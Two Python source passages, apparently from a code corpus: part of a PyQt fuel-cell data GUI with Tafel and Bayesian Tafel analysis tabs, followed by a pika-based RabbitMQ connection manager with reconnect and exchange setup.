ax = fig.subplots()
self.vishandler.draw_plot(ax)
self.xlabel_txtbx_vis.setText(ax.get_xlabel())
self.ylabel_txtbx_vis.setText(ax.get_ylabel())
# self.xmin_txtbx_vis.setText(f'{ax.get_xlim()[0]:.2f}')
# self.xmax_txtbx_vis.setText(f'{ax.get_xlim()[1]:.2f}')
# self.ymin_txtbx_vis.setText(f'{ax.get_ylim()[0]:.2f}')
# self.ymax_txtbx_vis.setText(f'{ax.get_ylim()[1]:.2f}')
self.line_dict_vis = {d.get_label():d for d in self.vishandler.get_plot_data()}
self.lineselector_menu_vis.clear()
for n in self.line_dict_vis.keys():
self.lineselector_menu_vis.addItem(n)
self.shwowleg_action_vis()
ax.tick_params(axis='both', direction='in')
self.figcanvas_vis.draw()
def get_ax_vis(self):
fig = self.figcanvas_vis.figure
ax = fig.get_axes()
return ax[0]
def default_saveloc_vis(self):
dataloc = self.folder_txtbx_data.text()
saveloc = os.path.join(dataloc, 'figures')
if not os.path.exists(saveloc):
os.mkdir(saveloc)
return saveloc
##################
# Tafel Analysis #
##################
### tafel layout ###
def tafel_layout(self):
# data selection header
self.header_tafel = QLabel('Tafel Analysis')
self.header_tafel.setFont(FuelcellUI.headerfont)
# use existing widgets
self.useexisting_chkbx_tafel = QCheckBox('Use previously loaded data')
self.useexisting_chkbx_tafel.setCheckState(Qt.Unchecked)
self.useexisting_chkbx_tafel.setLayoutDirection(Qt.RightToLeft)
# folder selection widgets
self.folder_lbl_tafel = QLabel('Data folder')
self.folder_txtbx_tafel = QLineEdit(FuelcellUI.homedir)
self.folder_btn_tafel = QPushButton('Choose folder...')
#file selection widgets
self.file_lbl_tafel = QLabel('Data files')
self.file_txtbx_tafel = QLineEdit()
self.file_btn_tafel = QPushButton('Choose files...')
# load data button
self.loaddata_btn_tafel = QPushButton('Load data')
#figure layout
self.figlayout_tafel = self.figure_layout_tafel()
# save plot header
self.header_saveplot_tafel = QLabel('Save Plot')
self.header_saveplot_tafel.setFont(FuelcellUI.headerfont)
# save plot widgets
self.saveloc_lbl_tafel = QLabel('Save location')
self.saveloc_txtbx_tafel = QLineEdit()
self.saveloc_btn_tafel = QPushButton('Choose location...')
self.save_btn_tafel = QPushButton('Save Current Figure')
# connect widgets
self.useexisting_chkbx_tafel.stateChanged.connect(self.useexisting_action_tafel)
self.folder_txtbx_tafel.textChanged.connect(self.folder_action_tafel)
self.folder_btn_tafel.clicked.connect(self.choose_folder_tafel)
self.file_txtbx_tafel.textChanged.connect(self.file_action_tafel)
self.file_btn_tafel.clicked.connect(self.choose_files_tafel)
self.loaddata_btn_tafel.clicked.connect(self.loaddata_action_tafel)
self.saveloc_btn_tafel.clicked.connect(self.choose_saveloc_tafel)
self.save_btn_tafel.clicked.connect(self.save_action_tafel)
# build layout
layout = QGridLayout()
row = 0
layout.addWidget(self.header_tafel, row, 0, 1, -1, Qt.AlignHCenter)
row += 1
layout.addWidget(self.useexisting_chkbx_tafel, row, 0, 1, -1, Qt.AlignRight)
row += 1
layout.addWidget(self.folder_lbl_tafel, row, 0)
layout.addWidget(self.folder_txtbx_tafel, row, 1)
layout.addWidget(self.folder_btn_tafel, row, 2)
row += 1
layout.addWidget(self.file_lbl_tafel, row, 0)
layout.addWidget(self.file_txtbx_tafel, row, 1)
layout.addWidget(self.file_btn_tafel, row, 2)
row += 1
layout.addWidget(self.loaddata_btn_tafel, row, 0, 1, -1, Qt.AlignHCenter)
row += 1
layout.addLayout(self.figlayout_tafel, row, 0, 1, -1, Qt.AlignLeft)
row += 1
layout.addWidget(self.header_saveplot_tafel, row, 0, 1, -1, Qt.AlignHCenter)
row += 1
layout.addWidget(self.saveloc_lbl_tafel, row, 0)
layout.addWidget(self.saveloc_txtbx_tafel, row, 1)
layout.addWidget(self.saveloc_btn_tafel, row, 2)
row += 1
layout.addWidget(self.save_btn_tafel, row, 0, 1, -1, Qt.AlignHCenter)
return layout
def figure_layout_tafel(self):
# plot features header
self.header_plotparams_tafel = QLabel('Plot Options')
self.header_plotparams_tafel.setFont(FuelcellUI.headerfont)
# # visualization selection widgets
# self.vistype_lbl = QLabel('Visualization type')
# self.vistype_menu = QComboBox()
# for name in FuelcellUI.vis_types:
# self.vistype_menu.addItem(name)
# column selection layout
self.colslayout_tafel = self.colselection_layout_tafel()
# plot features
self.plotfeatures_tafel = self.plotfeatures_layout_tafel()
# actual figure
self.figcanvas_tafel = FigureCanvas(Figure(figsize=FuelcellUI.default_figsize))
self.figcanvas_tafel.figure.subplots()
# line properties header
self.header_lineprops_tafel = QLabel('Line Options')
self.header_lineprops_tafel.setFont(FuelcellUI.headerfont)
# line selector menu
self.lineselector_lbl_tafel = QLabel('line')
self.lineselector_menu_tafel = QComboBox()
# for n in FuelcellUI.tintin:
# self.lineselector_menu_tafel.addItem(n)
# line properties layout
# figure properties
self.figprops_tafel = self.figprops_layout_tafel()
self.lineselector_menu_tafel.currentTextChanged.connect(self.lineselector_action_tafel)
# build layout
layout = QGridLayout()
layout.addWidget(self.header_plotparams_tafel, 0, 0, 1, 2, Qt.AlignHCenter)
# layout.addWidget(self.vistype_lbl, 1, 0, Qt.AlignLeft)
# layout.addWidget(self.vistype_menu, 1, 1, Qt.AlignLeft)
layout.addLayout(self.colslayout_tafel, 1, 0, 1, 2, Qt.AlignLeft)
layout.addLayout(self.plotfeatures_tafel, 2, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.figcanvas_tafel, 0, 2, 3, 1, Qt.AlignHCenter)
layout.addLayout(self.figprops_tafel, 3, 2, 1, 1, Qt.AlignHCenter)
layout.addWidget(self.header_lineprops_tafel, 0, 3, 1, 2, Qt.AlignHCenter)
layout.addWidget(self.lineselector_lbl_tafel, 1, 3, Qt.AlignLeft)
layout.addWidget(self.lineselector_menu_tafel, 1, 4, Qt.AlignLeft)
return layout
def colselection_layout_tafel(self):
# x column
self.xcol_lbl_tafel = QLabel('log(current) column')
self.xcol_txtbx_tafel = QLineEdit('0')
# y column
self.ycol_lbl_tafel = QLabel('Overpotential column')
self.ycol_txtbx_tafel = QLineEdit('1')
self.xcol_txtbx_tafel.textChanged.connect(self.xcol_action_tafel)
self.ycol_txtbx_tafel.textChanged.connect(self.ycol_action_tafel)
# build layout
layout = QGridLayout()
row = 0
layout.addWidget(self.xcol_lbl_tafel, row, 0, Qt.AlignLeft)
layout.addWidget(self.xcol_txtbx_tafel, row, 1, Qt.AlignLeft)
row += 1
layout.addWidget(self.ycol_lbl_tafel, row, 0, Qt.AlignLeft)
layout.addWidget(self.ycol_txtbx_tafel, row, 1, Qt.AlignLeft)
# resize widgets
for i in range(layout.count()):
w = layout.itemAt(i).widget()
if isinstance(w, QLineEdit):
self.set_max_width(w, 1.5)
return layout
def plotfeatures_layout_tafel(self):
# Tafel Values
self.tafel_slope_lbl = QLabel('Tafel slope: ')
self.tafel_slope_val = QLabel('')
self.tafel_exchg_lbl = QLabel('Exchange current density: ')
self.tafel_exchg_val = QLabel('')
self.tafel_rsq_lbl = QLabel('Linearity (R-squared):')
self.tafel_rsq_val = QLabel('')
self.tafel_slope_val.setFont(FuelcellUI.valuefont)
self.tafel_exchg_val.setFont(FuelcellUI.valuefont)
self.tafel_rsq_val.setFont(FuelcellUI.valuefont)
# x-axis label
self.xlabel_lbl_tafel = QLabel('x-axis label')
self.xlabel_txtbx_tafel = QLineEdit('log(current)')
# y-axis label
self.ylabel_lbl_tafel = QLabel('y-axis label')
self.ylabel_txtbx_tafel = QLineEdit('Overpotential [V]')
# current limits
self.mincurr_lbl_tafel = QLabel('Lower bound')
self.mincurr_txtbx_tafel = QLineEdit()
self.maxcurr_lbl_tafel = QLabel('Upper bound')
self.maxcurr_txtbx_tafel = QLineEdit()
# x-axis limits
self.xmin_lbl_tafel = QLabel('x min')
self.xmin_txtbx_tafel = QLineEdit()
self.xmax_lbl_tafel = QLabel('x max')
self.xmax_txtbx_tafel = QLineEdit()
# y-axis limits
self.ymin_lbl_tafel = QLabel('y min')
self.ymin_txtbx_tafel = QLineEdit()
self.ymax_lbl_tafel = QLabel('y max')
self.ymax_txtbx_tafel = QLineEdit()
# connect widgets
self.xlabel_txtbx_tafel.textChanged.connect(self.xlabel_action_tafel)
self.ylabel_txtbx_tafel.textChanged.connect(self.ylabel_action_tafel)
self.xmin_txtbx_tafel.textChanged.connect(self.xlim_action_tafel)
self.xmax_txtbx_tafel.textChanged.connect(self.xlim_action_tafel)
self.ymin_txtbx_tafel.textChanged.connect(self.ylim_action_tafel)
self.ymax_txtbx_tafel.textChanged.connect(self.ylim_action_tafel)
self.mincurr_txtbx_tafel.textChanged.connect(self.mincurr_action_tafel)
self.maxcurr_txtbx_tafel.textChanged.connect(self.maxcurr_action_tafel)
# build layout
layout = QGridLayout()
row = 0
layout.addWidget(self.mincurr_lbl_tafel, row, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.mincurr_txtbx_tafel, row, 2, 1, 2, Qt.AlignLeft)
row += 1
layout.addWidget(self.maxcurr_lbl_tafel, row, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.maxcurr_txtbx_tafel, row, 2, 1, 2, Qt.AlignLeft)
row += 1
layout.addWidget(self.tafel_slope_lbl, row, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.tafel_slope_val, row, 2, 1, 2, Qt.AlignLeft)
row += 1
layout.addWidget(self.tafel_exchg_lbl, row, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.tafel_exchg_val, row, 2, 1, 2, Qt.AlignLeft)
row += 1
layout.addWidget(self.tafel_rsq_lbl, row, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.tafel_rsq_val, row, 2, 1, 2, Qt.AlignLeft)
row += 1
layout.addWidget(self.xlabel_lbl_tafel, row, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.xlabel_txtbx_tafel, row, 2, 1, 2, Qt.AlignLeft)
row += 1
layout.addWidget(self.ylabel_lbl_tafel, row, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.ylabel_txtbx_tafel, row, 2, 1, 2, Qt.AlignLeft)
# row += 1
# layout.addWidget(self.mincurr_lbl_tafel, row, 0, 1, 2, Qt.AlignLeft)
# layout.addWidget(self.mincurr_txtbx_tafel, row, 2, 1, 2, Qt.AlignLeft)
# row += 1
# layout.addWidget(self.maxcurr_lbl_tafel, row, 0, 1, 2, Qt.AlignLeft)
# layout.addWidget(self.maxcurr_txtbx_tafel, row, 2, 1, 2, Qt.AlignLeft)
row += 1
layout.addWidget(self.xmin_lbl_tafel, row, 0, Qt.AlignLeft)
layout.addWidget(self.xmin_txtbx_tafel, row, 1, Qt.AlignLeft)
layout.addWidget(self.xmax_lbl_tafel, row, 2, Qt.AlignLeft)
layout.addWidget(self.xmax_txtbx_tafel, row, 3, Qt.AlignLeft)
row += 1
layout.addWidget(self.ymin_lbl_tafel, row, 0, Qt.AlignLeft)
layout.addWidget(self.ymin_txtbx_tafel, row, 1, Qt.AlignLeft)
layout.addWidget(self.ymax_lbl_tafel, row, 2, Qt.AlignLeft)
layout.addWidget(self.ymax_txtbx_tafel, row, 3, Qt.AlignLeft)
# resize widgets
for i in range(layout.count()):
w = layout.itemAt(i).widget()
if isinstance(w, QLineEdit):
self.set_min_height(w)
# self.set_min_width(w)
if isinstance(w, QLabel):
self.set_max_height(w, 1.5)
self.set_max_width(self.xmin_txtbx_tafel, 0.5)
self.set_max_width(self.xmax_txtbx_tafel, 0.5)
self.set_max_width(self.ymin_txtbx_tafel, 0.5)
self.set_max_width(self.ymax_txtbx_tafel, 0.5)
return layout
def figprops_layout_tafel(self):
# fig width
self.figw_lbl_tafel = QLabel('Figure width')
self.figw_txtbx_tafel = QLineEdit(str(FuelcellUI.default_figsize[0]))
# fig height
self.figh_lbl_tafel = QLabel('Figue height')
self.figh_txtbx_tafel = QLineEdit(str(FuelcellUI.default_figsize[1]))
# fig resolution
self.figres_lbl_tafel = QLabel('Figure resolution (DPI)')
self.figres_txtbx_tafel = QLineEdit(str(FuelcellUI.default_figres))
self.figw_txtbx_tafel.textChanged.connect(self.figsize_action_tafel)
self.figh_txtbx_tafel.textChanged.connect(self.figsize_action_tafel)
# build layout
layout = QGridLayout()
row = 0
layout.addWidget(self.figw_lbl_tafel, row, 0, Qt.AlignHCenter)
layout.addWidget(self.figh_lbl_tafel, row, 1, Qt.AlignHCenter)
layout.addWidget(self.figres_lbl_tafel, row, 2, Qt.AlignHCenter)
row += 1
layout.addWidget(self.figw_txtbx_tafel, row, 0, Qt.AlignHCenter)
layout.addWidget(self.figh_txtbx_tafel, row, 1, Qt.AlignHCenter)
layout.addWidget(self.figres_txtbx_tafel, row, 2, Qt.AlignHCenter)
for i in range(layout.count()):
w = layout.itemAt(i).widget()
if isinstance(w, QLineEdit):
self.set_max_width(w, 0.75)
return layout
### tafel actions ###
def useexisting_action_tafel(self):
state = self.useexisting_chkbx_tafel.isChecked()
if state:
if not self.datahandler.get_data():
self.update_status('No data to visualize')
self.useexisting_chkbx_tafel.setCheckState(Qt.Unchecked)
state = False
else:
self.vishandler.set_data(self.datahandler.get_data())
self.folder_lbl_tafel.setEnabled(not state)
self.folder_txtbx_tafel.setEnabled(not state)
self.folder_btn_tafel.setEnabled(not state)
self.file_lbl_tafel.setEnabled(not state)
self.file_txtbx_tafel.setEnabled(not state)
self.file_btn_tafel.setEnabled(not state)
self.loaddata_btn_tafel.setEnabled(not state)
if state:
self.draw_plot_tafel()
def choose_folder_tafel(self):
fd = QFileDialog()
filepath = fd.getExistingDirectory(self, 'Data Folder', FuelcellUI.homedir)
if filepath:
self.folder_txtbx_tafel.setText(filepath)
self.file_txtbx_tafel.setText('')
def choose_files_tafel(self):
fd = QFileDialog()
files, _ = fd.getOpenFileNames(self, 'Data Files', FuelcellUI.homedir)
if files:
names = [os.path.basename(f) for f in files]
folder = os.path.dirname(files[0])
self.file_txtbx_tafel.setText('; '.join(names))
self.folder_txtbx_tafel.setText(folder)
def folder_action_tafel(self):
try:
folder = self.folder_txtbx_tafel.text()
self.vishandler.set_datafolder(folder)
self.file_action_tafel()
except Exception as e:
self.update_status('ERROR: ' + str(e))
def file_action_tafel(self):
file_str = self.file_txtbx_tafel.text()
folder = self.folder_txtbx_tafel.text()
try:
if not file_str:
files = self.get_all_files(folder, valid=fc.utils.valid_types)
self.file_txtbx_tafel.setText('; '.join(files))
else:
files = file_str.split('; ')
files = [os.path.join(folder, f) for f in files]
self.vishandler.set_datafiles(files)
except Exception as e:
self.update_status('ERROR: ' + str(e))
def loaddata_action_tafel(self):
try:
self.vishandler.load_tafel()
self.draw_plot_tafel()
except Exception as e:
self.update_status('ERROR: ' + str(e))
def xcol_action_tafel(self):
col = self.xcol_txtbx_tafel.text()
if col.isdigit():
col = int(col)
self.vishandler.set_xcol(col)
self.draw_plot_tafel()
def ycol_action_tafel(self):
col = self.ycol_txtbx_tafel.text()
if col.isdigit():
col = int(col)
self.vishandler.set_ycol(col)
self.draw_plot_tafel()
def mincurr_action_tafel(self):
new_min = self.mincurr_txtbx_tafel.text()
new_max = self.maxcurr_txtbx_tafel.text()
try:
new_min = float(new_min)
except ValueError:
new_min = None
self.update_status('bounds must be numbers')
try:
new_max = float(new_max)
except ValueError:
new_max = None
self.update_status('bounds must be numbers')
try:
fig = self.figcanvas_tafel.figure
fig.clf()
ax = self.figcanvas_tafel.figure.subplots()
this_data = self.tafel_dict[self.lineselector_menu_tafel.currentText()]
fc.visuals.plot_tafel(data=[this_data], ax=ax, imin=new_min, imax=new_max)
self.tafel_slope_val.setText(str(this_data.get_tafel_slope()))
self.tafel_exchg_val.setText(str(this_data.get_exchg_curr()))
self.tafel_rsq_val.setText(str(this_data.get_tafel_rsq()))
self.figcanvas_tafel.draw()
except Exception as e:
self.update_status('ERROR: ' + str(e))
def maxcurr_action_tafel(self):
new_max = self.maxcurr_txtbx_tafel.text()
new_min = self.mincurr_txtbx_tafel.text()
try:
new_min = float(new_min)
except ValueError:
new_min = None
self.update_status('bounds must be numbers')
try:
new_max = float(new_max)
except ValueError:
new_max = None
self.update_status('bounds must be numbers')
try:
fig = self.figcanvas_tafel.figure
fig.clf()
ax = self.figcanvas_tafel.figure.subplots()
this_data = self.tafel_dict[self.lineselector_menu_tafel.currentText()]
fc.visuals.plot_tafel(data=[this_data], ax=ax, imax=new_max, imin=new_min)
self.tafel_slope_val.setText(str(this_data.get_tafel_slope()))
self.tafel_exchg_val.setText(str(this_data.get_exchg_curr()))
self.tafel_rsq_val.setText(str(this_data.get_tafel_rsq()))
self.figcanvas_tafel.draw()
except Exception as e:
self.update_status('ERROR: ' + str(e))
def xlabel_action_tafel(self):
new_label = self.xlabel_txtbx_tafel.text()
ax = self.get_ax_tafel()
ax.set_xlabel(new_label)
self.figcanvas_tafel.draw()
def ylabel_action_tafel(self):
new_label = self.ylabel_txtbx_tafel.text()
ax = self.get_ax_tafel()
ax.set_ylabel(new_label)
self.figcanvas_tafel.draw()
def xlim_action_tafel(self):
xmin_text = self.xmin_txtbx_tafel.text()
xmax_text = self.xmax_txtbx_tafel.text()
ax = self.get_ax_tafel()
try:
xmin = float(xmin_text)
ax.set_xbound(lower=xmin)
except ValueError:
self.update_status('xmin must be a number')
try:
xmax = float(xmax_text)
ax.set_xbound(upper=xmax)
except ValueError:
self.update_status('xmax must be a number')
self.figcanvas_tafel.draw()
def ylim_action_tafel(self):
ymin_text = self.ymin_txtbx_tafel.text()
ymax_text = self.ymax_txtbx_tafel.text()
ax = self.get_ax_tafel()
try:
ymin = float(ymin_text)
ax.set_ybound(lower=ymin)
except ValueError:
self.update_status('ymin must be a number')
try:
ymax = float(ymax_text)
ax.set_ybound(upper=ymax)
except ValueError:
self.update_status('ymax must be a number')
self.figcanvas_tafel.draw()
def figsize_action_tafel(self):
fig = self.figcanvas_tafel.figure
width = self.figw_txtbx_tafel.text()
height = self.figh_txtbx_tafel.text()
try:
width = float(width)
height = float(height)
fig.set_figwidth(width)
fig.set_figheight(height)
self.figcanvas_tafel.draw()
except ValueError:
self.update_status('Figure width and height must be numbers')
def lineselector_action_tafel(self):
try:
new_label = self.lineselector_menu_tafel.currentText()
new_data = self.tafel_dict[new_label]
fig = self.figcanvas_tafel.figure
fig.clf()
ax = self.figcanvas_tafel.figure.subplots()
fc.visuals.plot_tafel(data=[new_data], ax=ax)
self.figcanvas_tafel.draw()
self.tafel_slope_val.setText(str(new_data.get_tafel_slope()))
self.tafel_exchg_val.setText(str(new_data.get_exchg_curr()))
self.tafel_rsq_val.setText(str(new_data.get_tafel_rsq()))
except TypeError:
self.update_status('Invalid fit parameters')
def choose_saveloc_tafel(self):
fd = QFileDialog()
fd.setViewMode(QFileDialog.Detail)
fd.setDefaultSuffix('png')
filename, _ = fd.getSaveFileName(self, 'Save Location', self.default_saveloc_vis())
if not filename:
filename = self.default_saveloc_vis()
self.saveloc_txtbx_tafel.setText(filename)
def save_action_tafel(self):
try:
fig = self.figcanvas_tafel.figure
loc = self.saveloc_txtbx_tafel.text()
dpi = self.figres_txtbx_tafel.text()
if not dpi.isdigit():
self.update_status('Figure resolution must be an integer')
dpi = 300
else:
dpi = int(dpi)
fig.savefig(loc, dpi=dpi)
self.update_status('Image saved successfully')
except Exception as e:
self.update_status('ERROR: ' + str(e))
def draw_plot_tafel(self):
try:
fig = self.figcanvas_tafel.figure
fig.clf()
ax = self.figcanvas_tafel.figure.subplots()
tafel_data = self.vishandler.get_tafel_data()
self.tafel_dict = {d.get_label():d for d in tafel_data}
for n in self.tafel_dict.keys():
self.lineselector_menu_tafel.addItem(n)
this_data = tafel_data[0]
# name = self.lineselector_menu_tafel.currentText()
# data = self.tafel_dict[name]
# self.hfrsemi_val.setText(str(data.get_hfr()))
# self.hfrlin_val.setText(str(data.get_hfr_linear()))
fc.visuals.plot_tafel(data=[this_data], ax=ax)
self.tafel_slope_val.setText(str(this_data.get_tafel_slope()))
self.tafel_exchg_val.setText(str(this_data.get_exchg_curr()))
self.tafel_rsq_val.setText(str(this_data.get_tafel_rsq()))
self.figcanvas_tafel.draw()
except Exception as e:
self.update_status('ERROR: ' + str(e))
def get_ax_tafel(self):
fig = self.figcanvas_tafel.figure
ax = fig.get_axes()
return ax[0]
###########################
# Bayesian Tafel Analysis #
###########################
### bayes layout ###
def bayes_layout(self):
# data selection header
self.header_bayes = QLabel('Bayesian Tafel Analysis')
self.header_bayes.setFont(FuelcellUI.headerfont)
# use existing widgets
self.useexisting_chkbx_bayes = QCheckBox('Use previously loaded data')
self.useexisting_chkbx_bayes.setCheckState(Qt.Unchecked)
self.useexisting_chkbx_bayes.setLayoutDirection(Qt.RightToLeft)
# folder selection widgets
self.folder_lbl_bayes = QLabel('Data folder')
self.folder_txtbx_bayes = QLineEdit(FuelcellUI.homedir)
self.folder_btn_bayes = QPushButton('Choose folder...')
#file selection widgets
self.file_lbl_bayes = QLabel('Data files')
self.file_txtbx_bayes = QLineEdit()
self.file_btn_bayes = QPushButton('Choose files...')
# load data button
self.loaddata_btn_bayes = QPushButton('Load data')
# figure layout
self.figlayout_bayes = self.figure_layout_bayes()
# save plot header
self.header_saveplot_bayes = QLabel('Save Plot')
self.header_saveplot_bayes.setFont(FuelcellUI.headerfont)
# save plot widgets
self.saveloc_lbl_bayes = QLabel('Save location')
self.saveloc_txtbx_bayes = QLineEdit()
self.saveloc_btn_bayes = QPushButton('Choose location...')
self.save_btn_bayes = QPushButton('Save Current Figure')
# connect widgets
self.useexisting_chkbx_bayes.stateChanged.connect(self.useexisting_action_bayes)
self.folder_txtbx_bayes.textChanged.connect(self.folder_action_bayes)
self.folder_btn_bayes.clicked.connect(self.choose_folder_bayes)
self.file_txtbx_bayes.textChanged.connect(self.file_action_bayes)
self.file_btn_bayes.clicked.connect(self.choose_files_bayes)
self.loaddata_btn_bayes.clicked.connect(self.loaddata_action_bayes)
self.saveloc_btn_bayes.clicked.connect(self.choose_saveloc_bayes)
self.save_btn_bayes.clicked.connect(self.save_action_bayes)
# build layout
layout = QGridLayout()
row = 0
layout.addWidget(self.header_bayes, row, 0, 1, -1, Qt.AlignHCenter)
row += 1
layout.addWidget(self.useexisting_chkbx_bayes, row, 0, 1, -1, Qt.AlignRight)
row += 1
layout.addWidget(self.folder_lbl_bayes, row, 0)
layout.addWidget(self.folder_txtbx_bayes, row, 1)
layout.addWidget(self.folder_btn_bayes, row, 2)
row += 1
layout.addWidget(self.file_lbl_bayes, row, 0)
layout.addWidget(self.file_txtbx_bayes, row, 1)
layout.addWidget(self.file_btn_bayes, row, 2)
row += 1
layout.addWidget(self.loaddata_btn_bayes, row, 0, 1, -1, | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
# pylint: disable=C0111,C0103,R0205
__author__ = 'guotengfei'
import functools
import logging
import traceback
import pika
from pika.adapters.tornado_connection import TornadoConnection
LOGGER = logging.getLogger(__name__)
# 异常捕获
def exception_catch(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
LOGGER.error("conn init Error: %s", repr(e))
LOGGER.error(traceback.format_exc())
conn = args[0]
conn.close_channel()
return wrapper
class MQConnection(object):
"""
MQ连接管理类
"""
def __init__(self, url, type='producer', callback=None, *arg, **settings):
"""Create a new instance of the MQConnection class, passing in the AMQP
URL used to connect to RabbitMQ.
:param str amqp_url: The AMQP url to connect with
:param str type: connection type,for excmple,'consumer','producer'
:param str callback: if type is 'consumer',callback is not None
"""
self._connection = None
self._channel = None
self._closing = False
self._consumer_tag = None
self._url = url
self._type = type
self._was_consuming = False
self._was_publishing = False
self._reconnect_delay = 0
self._callback = callback
self.EXCHANGE = settings.get('exchange')
self.QUEUE = settings.get('queue')
self.ROUTING_KEY = settings.get('routing_key')
self.EXCHANGE_TYPE = settings.get('exchange_type')
self.AE_EXCHANGE = settings.get('ae_exchange')
self.AE_QUEUE = settings.get('ae_queue')
self.AE_EXCHANGE_TYPE = settings.get('ae_exchange_type')
self.DL_EXCHANGE = settings.get('dl_exchange')
self.DL_QUEUE = settings.get('dl_queue')
self.DL_EXCHANGE_TYPE = settings.get('dl_exchange_type')
self._passive = settings.get('passive', True)
self._durable = settings.get('durable', True)
self._prefetch_count = settings.get('prefetch_count', 128)
@exception_catch
def connect(self):
"""This method connects to RabbitMQ, returning the connection handle.
When the connection is established, the on_connection_open method
will be invoked by pika.
:rtype: pika.SelectConnection
"""
LOGGER.info('Connecting to %s', self._url)
self._connection = TornadoConnection(pika.URLParameters(self._url),
on_open_callback=self.on_connection_open,
on_open_error_callback=self.on_connection_open_error)
return self._connection
def on_connection_open_error(self, _unused_connection, err):
"""This method is called by pika if the connection to RabbitMQ
can't be established.
:param pika.SelectConnection _unused_connection: The connection
:param Exception err: The error
"""
reconnect_delay = self._get_reconnect_delay()
LOGGER.error('Connection open failed, reopening in %d seconds: %s', reconnect_delay, err)
self._connection.ioloop.call_later(reconnect_delay, self.reconnect)
def close_connection(self):
"""This method closes the connection to RabbitMQ."""
LOGGER.info('Closing connection')
self._connection.close()
def add_on_connection_close_callback(self):
"""This method adds an on close callback that will be invoked by pika
when RabbitMQ closes the connection to the publisher unexpectedly.
"""
LOGGER.info('Adding connection close callback')
self._connection.add_on_close_callback(self.on_connection_closed)
def on_connection_closed(self, connection, reason):
"""This method is invoked by pika when the connection to RabbitMQ is
closed unexpectedly. Since it is unexpected, we will reconnect to
RabbitMQ if it disconnects.
:param pika.connection.Connection connection: The closed connection obj
:param Exception reason: exception representing reason for loss of
connection.
"""
self._channel = None
if self._closing:
pass
# self._connection.ioloop.stop()
else:
reconnect_delay = self._get_reconnect_delay()
LOGGER.warning('Connection closed, reopening in %d seconds: %s',
reconnect_delay, reason)
self._connection.ioloop.call_later(reconnect_delay, self.reconnect)
def on_connection_open(self, unused_connection):
"""This method is called by pika once the connection to RabbitMQ has
been established. It passes the handle to the connection object in
case we need it, but in this case, we'll just mark it unused.
:param pika.SelectConnection _unused_connection: The connection
"""
LOGGER.info('Connection opened')
self.add_on_connection_close_callback()
self.open_channel()
def reconnect(self):
"""Will be invoked by the IOLoop timer if the connection is
closed. See the on_connection_closed method.
"""
self._was_consuming = False
self._was_publishing = False
if not self._closing:
# Create a new connection
self._connection = self.connect()
def add_on_channel_close_callback(self):
"""This method tells pika to call the on_channel_closed method if
RabbitMQ unexpectedly closes the channel.
"""
LOGGER.info('Adding channel close callback')
self._channel.add_on_close_callback(self.on_channel_closed)
def on_channel_closed(self, channel, reason):
"""Invoked by pika when RabbitMQ unexpectedly closes the channel.
Channels are usually closed if you attempt to do something that
violates the protocol, such as re-declare an exchange or queue with
different parameters. In this case, we'll close the connection
to shutdown the object.
:param pika.channel.Channel: The closed channel
:param Exception reason: why the channel was closed
"""
LOGGER.warning('Channel %i was closed: %s', channel, reason)
if self._connection.is_open:
self._connection.close()
def on_channel_open(self, channel):
"""This method is invoked by pika when the channel has been opened.
The channel object is passed in so we can make use of it.
Since the channel is now open, we'll declare the exchange to use.
:param pika.channel.Channel channel: The channel object
"""
LOGGER.info('Channel opened')
self._channel = channel
self.add_on_channel_close_callback()
self.setup_exchange(self.EXCHANGE)
if self.AE_EXCHANGE:
self.setup_ae_exchange(self.AE_EXCHANGE)
if self.DL_EXCHANGE:
self.setup_dl_exchange(self.DL_EXCHANGE)
@exception_catch
def setup_exchange(self, exchange_name):
"""Setup the exchange on RabbitMQ by invoking the Exchange.Declare RPC
command. When it is complete, the on_exchange_declareok method will
be invoked by pika.
:param str|unicode exchange_name: The name of the exchange to declare
"""
cb = functools.partial(
self.on_exchange_declareok, userdata=exchange_name)
args = {}
if self.AE_EXCHANGE:
args['alternate-exchange'] = self.AE_EXCHANGE
self._channel.exchange_declare(
passive=self._passive,
durable=self._durable,
exchange=exchange_name,
exchange_type=self.EXCHANGE_TYPE,
arguments=args,
callback=cb)
@exception_catch
def setup_ae_exchange(self, exchange_name):
"""Setup the exchange on RabbitMQ by invoking the Exchange.Declare RPC
command. When it is complete, the on_exchange_declareok method will
be invoked by pika.
:param str|unicode exchange_name: The name of the exchange to declare
"""
ae_cb = functools.partial(
self.on_ae_exchange_declareok, userdata=exchange_name)
self._channel.exchange_declare(
passive=self._passive,
durable=False,
exchange=exchange_name,
exchange_type=self.AE_EXCHANGE_TYPE,
arguments={},
callback=ae_cb)
@exception_catch
def setup_dl_exchange(self, exchange_name):
"""Setup the exchange on RabbitMQ by invoking the Exchange.Declare RPC
command. When it is complete, the on_exchange_declareok method will
be invoked by pika.
:param str|unicode exchange_name: The name of the exchange to declare
"""
cb = functools.partial(
self.on_dl_exchange_declareok, userdata=exchange_name)
self._channel.exchange_declare(
passive=self._passive,
durable=False,
exchange=exchange_name,
exchange_type=self.DL_EXCHANGE_TYPE,
arguments={},
callback=cb)
def on_exchange_declareok(self, _unused_frame, userdata):
"""Invoked by pika when RabbitMQ has finished the Exchange.Declare RPC
command.
:param pika.Frame.Method unused_frame: Exchange.DeclareOk response frame
:param str|unicode userdata: Extra user data (exchange name)
"""
LOGGER.info('Exchange declared: %s', userdata)
self.setup_queue(self.QUEUE)
def on_ae_exchange_declareok(self, _unused_frame, userdata):
"""Invoked by pika when RabbitMQ has finished the Exchange.Declare RPC
command.
:param pika.Frame.Method unused_frame: Exchange.DeclareOk response frame
:param str|unicode userdata: Extra user data (exchange name)
"""
LOGGER.info('Exchange declared: %s', userdata)
self.setup_ae_queue(self.AE_QUEUE)
def on_dl_exchange_declareok(self, _unused_frame, userdata):
"""Invoked by pika when RabbitMQ has finished the Exchange.Declare RPC
command.
:param pika.Frame.Method unused_frame: Exchange.DeclareOk response frame
:param str|unicode userdata: Extra user data (exchange name)
"""
LOGGER.info('Exchange declared: %s', userdata)
self.setup_dl_queue(self.DL_QUEUE)
@exception_catch
